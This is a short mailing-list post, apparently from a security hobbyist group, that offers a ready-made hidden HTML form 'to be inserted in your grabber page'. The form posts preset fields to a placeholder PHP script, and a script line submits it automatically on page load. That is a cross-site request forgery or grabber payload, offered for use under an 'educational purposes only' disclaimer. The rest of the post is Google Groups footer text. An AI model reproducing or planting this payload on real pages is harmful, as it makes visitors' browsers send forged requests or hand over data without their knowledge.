A sample hidden FORM for your ready reference; To be inserted in your grabber page....
------------------------ start of code --------------------------- <FORM action="http://host/yourphpscript.php" method="POST" name="main"> <input type="hidden" name="snp_priv" value="W"> <input type="hidden" name="action" value="W"> </FORM> <script> document.main.submit() </script> ------------------------ end of code --------------------------------- *** Strictly for educational purposes only *** Regards Amardeep T -- You received this message because you are subscribed to the Google Groups "nforceit" group. To post to this group, send an email to [email protected]. To unsubscribe from this group, send email to [email protected]. For more options, visit this group at http://groups.google.com/group/nforceit?hl=en-GB.
